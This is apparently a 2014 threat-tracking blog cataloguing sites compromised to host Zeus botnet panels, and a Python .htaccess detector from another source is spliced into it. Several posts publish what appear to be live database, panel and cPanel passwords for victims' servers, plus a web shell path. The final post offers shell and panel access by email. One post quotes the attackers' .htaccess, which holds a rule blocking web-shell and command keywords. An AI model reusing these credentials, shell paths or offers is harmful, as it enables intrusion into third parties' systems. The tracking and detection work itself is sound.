<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRN8WTfFFIe7WtrPN4IfnwQOBF-YQ8ZCuv7jCPEBv58chEwtek0ZrOEGiZw2RwC1FM8hRwLmlYXdiIdpTuqp0Rb6kDUpQgXDu-2_81nqgFTedAeKpEEXKcGJNo-16DEfplisqNkcTVr8s/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRN8WTfFFIe7WtrPN4IfnwQOBF-YQ8ZCuv7jCPEBv58chEwtek0ZrOEGiZw2RwC1FM8hRwLmlYXdiIdpTuqp0Rb6kDUpQgXDu-2_81nqgFTedAeKpEEXKcGJNo-16DEfplisqNkcTVr8s/s320/1.png" /></a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipaUwHR2DapE5_mEgyr2EvJ3UUxbrTBs0S6V21IDLs1dGpIa1QcafAtvXnBJGm4I7LbAF_AbJAL7HRXATtRn-7nd258kacb_Wvs0G62mqBy9ZsqtY2QckjWQd0C-Zdwk8-BJq4tzeEBZg/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipaUwHR2DapE5_mEgyr2EvJ3UUxbrTBs0S6V21IDLs1dGpIa1QcafAtvXnBJGm4I7LbAF_AbJAL7HRXATtRn-7nd258kacb_Wvs0G62mqBy9ZsqtY2QckjWQd0C-Zdwk8-BJq4tzeEBZg/s320/2.png" /></a></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirZuh_ezkW2z0VcI5hE1MXMpCg8XkHSFtCD-UkboVyjQZ0l0EG-s44HlNGwRH2Z86sv9RIkzK_fwvfAaTuAtXuB3XlY4zuoT5f7v3SC11I3x5K71k0FWKXJ_kKIbwXTImaa9KqqQaKakA/s1600/3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirZuh_ezkW2z0VcI5hE1MXMpCg8XkHSFtCD-UkboVyjQZ0l0EG-s44HlNGwRH2Z86sv9RIkzK_fwvfAaTuAtXuB3XlY4zuoT5f7v3SC11I3x5K71k0FWKXJ_kKIbwXTImaa9KqqQaKakA/s320/3.png" /></a>
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">// http://urlquery.net/report.php?id=1415211438936
// zeus panel
hxxp://kihsmalta.com/cp.php
// .htaccess file
deny from quttera.com
deny from hosts-file.net
deny from amada.abuse.ch
deny from palevotracker.abuse.ch
deny from blogger.com
deny from phishtank.com
deny from netcraft.com
deny from google.com
deny from yahoo.com
deny from malwared.ru
deny from malware.com.br
deny from malekal.com
deny from k7computing.com
deny from gdata.com
deny from gdatasoftware.com
deny from fortinet.com
deny from emsisoft.com
deny from quttera.com
deny from opera.com
deny from infospyware.com
deny from .................... etc
<files cron.php="">
allow from all
</files>
<files botnet_socks.php=""> allow from all
</files>
# Block shell uploaders, htshells, and other baddies
RewriteCond %{REQUEST_URI} ((php|my|bypass)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|c100|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR]
RewriteCond %{REQUEST_URI} (\.exe|\.php\?act=|\.tar|_vti|afilter=|algeria\.php|chbd|chmod|cmd|command|db_query|download_file|echo|edit_file|eval|evil_root|exploit|find_text|fopen|fsbuff|fwrite|friends_links\.|ftp|gofile|grab|grep|htshell|\ -dump|logname|lynx|mail_file|md5|mkdir|mkfile|mkmode|MSOffice|muieblackcat|mysql|owssvr\.dll|passthru|popen|proc_open|processes|pwd|rmdir|root|safe0ver|search_text|selfremove|setup\.php|shell|ShellAdresi\.TXT|spicon|sql|ssh|system|telnet|trojan|typo3|uname|unzip|w00tw00t|whoami|xampp) [NC,OR]
RewriteCond %{QUERY_STRING} (\.exe|\.tar|act=|afilter=|alter|benchmark|chbd|chmod|cmd|command|cast|char|concat|convert|create|db_query|declare|delete|download_file|drop|edit_file|encode|environ|eval|exec|exploit|find_text|fsbuff|ftp|friends_links\.|globals|gofile|grab|insert|localhost|logname|loopback|mail_file|md5|meta|mkdir|mkfile|mkmode|mosconfig|muieblackcat|mysql|order|passthru|popen|proc_open|processes|pwd|request|rmdir|root|scanner|script|search_text|select|selfremove|set|shell|sql|sp_executesql|spicon|ssh|system|telnet|trojan|truncate|uname|union|unzip|whoami) [NC]
RewriteRule .* - [F]
// extracted from Xylitol</code><code style="color: black; word-wrap: normal;">Malware family ZEUS
MD5 8f6b9dbfb715c4a8166401e6fc511964
Version 2.1.0.1
RC4 Keystream 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
</code></pre>
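The .htaccess above is a useful compromise indicator on its own: a legitimate site has no reason to deny abuse.ch, PhishTank, Netcraft or AV vendors while allow-listing cron.php and botnet_socks.php. The following triage helper is an added example (not code from the post): it parses Apache "deny from" lines and &lt;Files&gt; blocks and flags the pattern. The domain list is taken from the deny list captured above; the two sample .htaccess files are constructed for the example.

```python
"""Flag an .htaccess that blocks security researchers and allow-lists panel files.

Added example, not part of the original post. It models the evasion pattern
seen in the kihsmalta.com dump: "deny from" rules against malware trackers,
AV vendors and crawlers, plus <Files> blocks that re-open specific scripts.
"""
import re

# Domains from the captured deny list that a normal site would never block.
RESEARCH_DOMAINS = {
    "quttera.com", "hosts-file.net", "abuse.ch", "phishtank.com",
    "netcraft.com", "google.com", "yahoo.com", "malwared.ru",
    "malware.com.br", "malekal.com", "k7computing.com", "gdata.com",
    "gdatasoftware.com", "fortinet.com", "emsisoft.com", "opera.com",
    "infospyware.com",
}

DENY_RE = re.compile(r"^\s*deny\s+from\s+(\S+)", re.IGNORECASE)
FILES_OPEN_RE = re.compile(r"^\s*<Files\s+([^>\s]+)\s*>", re.IGNORECASE)
FILES_CLOSE_RE = re.compile(r"^\s*</Files\s*>", re.IGNORECASE)
ALLOW_ALL_RE = re.compile(r"^\s*allow\s+from\s+all\b", re.IGNORECASE)


def _is_research_host(host):
    """True if host equals, or is a subdomain of, a listed research domain."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in RESEARCH_DOMAINS)


def analyze_htaccess(text):
    """Return denied research hosts, files re-allowed inside <Files> blocks, and a verdict."""
    denied = []          # research/AV hosts that the file denies
    allowlisted = []     # scripts that get "allow from all" inside a <Files> block
    current_file = None  # name of the <Files> block we are inside, if any
    for line in text.splitlines():
        m = DENY_RE.match(line)
        if m:
            if _is_research_host(m.group(1)):
                denied.append(m.group(1).lower())
            continue
        m = FILES_OPEN_RE.match(line)
        if m:
            current_file = m.group(1)
            continue
        if FILES_CLOSE_RE.match(line):
            current_file = None
            continue
        if current_file and ALLOW_ALL_RE.match(line):
            allowlisted.append(current_file)
    return {
        "denied_research_hosts": denied,
        "allowlisted_files": allowlisted,
        # Any deny rule against a research host is enough to escalate for review.
        "suspicious": bool(denied),
    }


# Constructed sample modelled on the captured file (not the real one).
SAMPLE_HTACCESS = """\
order allow,deny
deny from quttera.com
deny from palevotracker.abuse.ch
deny from phishtank.com
deny from 203.0.113.7
<Files cron.php>
allow from all
</Files>
<Files botnet_socks.php>
allow from all
</Files>
"""

# Constructed benign file: a plain IP block, no research domains, no <Files> tricks.
BENIGN_HTACCESS = """\
order allow,deny
deny from 203.0.113.7
allow from all
"""

if __name__ == "__main__":
    for name, content in (("sample", SAMPLE_HTACCESS), ("benign", BENIGN_HTACCESS)):
        print(name, analyze_htaccess(content))
```

Run it over every .htaccess found under a web root during a site clean-up; the "allowlisted_files" list points straight at the scripts the operator wanted reachable, which is where the panel or its bot-facing gate usually lives.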
Posted by bi0<br />
2014-11-04: Zbot - motoecarro.com.br - Hacked<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd-tKB2wTe7095tHgMb-RGEU3MbMyBucH_LbRfZ7S2eQJu5AkMzbuBVT04EnZh1tGNUCLPkqvufPoGQ0vRHDy5SDRocIcp-BHVIFKHL0jZLH013VAXTmTeBYh58ayMyWaALf7N9ucsCEo/s1600/1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd-tKB2wTe7095tHgMb-RGEU3MbMyBucH_LbRfZ7S2eQJu5AkMzbuBVT04EnZh1tGNUCLPkqvufPoGQ0vRHDy5SDRocIcp-BHVIFKHL0jZLH013VAXTmTeBYh58ayMyWaALf7N9ucsCEo/s320/1.png" /></a><br><br><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Q3hSYEh0SZA5qTJFmD3sCIKlcgp-mllM3VqrfSVZue76XDMSfFScUk7oDXx91-kgdmW_tNkEaRx3iFJFHwqzzPmZngQ6Bh3U5bbIBaTssT63nSQ0LtYlSjGXKCirBVPlcUIsH9A6YSw/s1600/2.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Q3hSYEh0SZA5qTJFmD3sCIKlcgp-mllM3VqrfSVZue76XDMSfFScUk7oDXx91-kgdmW_tNkEaRx3iFJFHwqzzPmZngQ6Bh3U5bbIBaTssT63nSQ0LtYlSjGXKCirBVPlcUIsH9A6YSw/s320/2.png" /></a><br><pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">// mysql
$config['mysql_host'] = '127.0.0.1';
$config['mysql_user'] = 'motoecar_1';
$config['mysql_pass'] = 'J31OIPuOLSf$';
$config['mysql_db'] = 'motoecar_1';
// zeus panel
hxxp://motoecarro.com.br/images/cp.php
user : admin
pass : 123456
// config.bin
hxxp://motoecarro.com.br/images/config.bin</code></pre>
Posted by bi0<br />
2014-11-04: Zbot - menumaterno.com.br - Hacked<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBgi6ClG3229_wzMYQqfNJKnVACBTzm-blOWxBdt7Y0K0lMVX9-DY-rv9jlgNXhE2qnpMp-i9N4CG8J9mnSr8irWw7E58Yz7yZ5sxdYN9k9xzvFH7J7W-6uAxJXmYwgqDI-suOoIQ6vkI/s1600/02.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBgi6ClG3229_wzMYQqfNJKnVACBTzm-blOWxBdt7Y0K0lMVX9-DY-rv9jlgNXhE2qnpMp-i9N4CG8J9mnSr8irWw7E58Yz7yZ5sxdYN9k9xzvFH7J7W-6uAxJXmYwgqDI-suOoIQ6vkI/s320/02.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9iedC4j6hmaJr5wCceBkz4wkEPhg-usZX2Wgf-2RYFoy3eCSWI3rKI9FsmPcy5h8I3VyyqwiXEur4HXXgN1qqR3Pbb8UYy8O6uzQIOLDgP7KNV-VJa1jnUfeos5wqpjifN5VIPhnIu1Y/s1600/01.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9iedC4j6hmaJr5wCceBkz4wkEPhg-usZX2Wgf-2RYFoy3eCSWI3rKI9FsmPcy5h8I3VyyqwiXEur4HXXgN1qqR3Pbb8UYy8O6uzQIOLDgP7KNV-VJa1jnUfeos5wqpjifN5VIPhnIu1Y/s320/01.png" /></a>
<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">$config['mysql_host'] = '127.0.0.1';
$config['mysql_user'] = 'materno_labe';
$config['mysql_pass'] = '1qaz2wsx';
$config['mysql_db'] = 'materno_labe';
// hxxp://menumaterno.com.br/skins/tango/thumb.php [shell]
// zeus panel
hxxp://menumaterno.com.br/skins/tango/_labe/cp.php?m=home
user : admin
pass : 1qaz2wsx
[cpan]
password=provnet13
user=materno
</code></pre>
Posted by bi0<br />
2014-11-04: Zbot - e-rbi.org - Hacked<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoB5nb-h1YcftoqgwZnR5yGBWfDa9nvRo6uY_N43vIM6TZkQeJXISPF_YS3YUHi6VtXk0CfRHa6TE1T9HzEDcldTstwhaYwpY0ZWDrh6oF7ujADVHWZ9nI5yPLsebOd2jwPfGxpyIwyXg/s1600/1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoB5nb-h1YcftoqgwZnR5yGBWfDa9nvRo6uY_N43vIM6TZkQeJXISPF_YS3YUHi6VtXk0CfRHa6TE1T9HzEDcldTstwhaYwpY0ZWDrh6oF7ujADVHWZ9nI5yPLsebOd2jwPfGxpyIwyXg/s320/1.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4rZ6oWrLlECajIpeG44mv1eX-UFy-cDGczclk29d81XOV0EN25XB4Lltc6NPBJQryIY8PVvsp5nIOExEoFRBmpIuP7B4cGYETas5Y9Phi3wYq51YU7_XtO3ADl_ZaS-gO_1cEGniwQVg/s1600/2.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4rZ6oWrLlECajIpeG44mv1eX-UFy-cDGczclk29d81XOV0EN25XB4Lltc6NPBJQryIY8PVvsp5nIOExEoFRBmpIuP7B4cGYETas5Y9Phi3wYq51YU7_XtO3ADl_ZaS-gO_1cEGniwQVg/s320/2.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1Gr289PCQUmu-zlt8LcGkzc-7bw_amgSbu72L7jDPe9mdZAmkmT-R6YuoCPg4eu0ULVJGk1VsK4087E609R8zthWRkuqy16f4Sfq4_GJiS3jsq1ij38FqVa13FCU38jTNK5oHTcVy42M/s1600/3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1Gr289PCQUmu-zlt8LcGkzc-7bw_amgSbu72L7jDPe9mdZAmkmT-R6YuoCPg4eu0ULVJGk1VsK4087E609R8zthWRkuqy16f4Sfq4_GJiS3jsq1ij38FqVa13FCU38jTNK5oHTcVy42M/s320/3.png" /></a>
<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">hxxp://e-rbi.org/03/serverphp/cp.php
</code></pre>
<br />
<span style="font-size: x-small;">All info (PHP shell, Zeus panel): contact me at my email!!</span><br />
Posted by bi0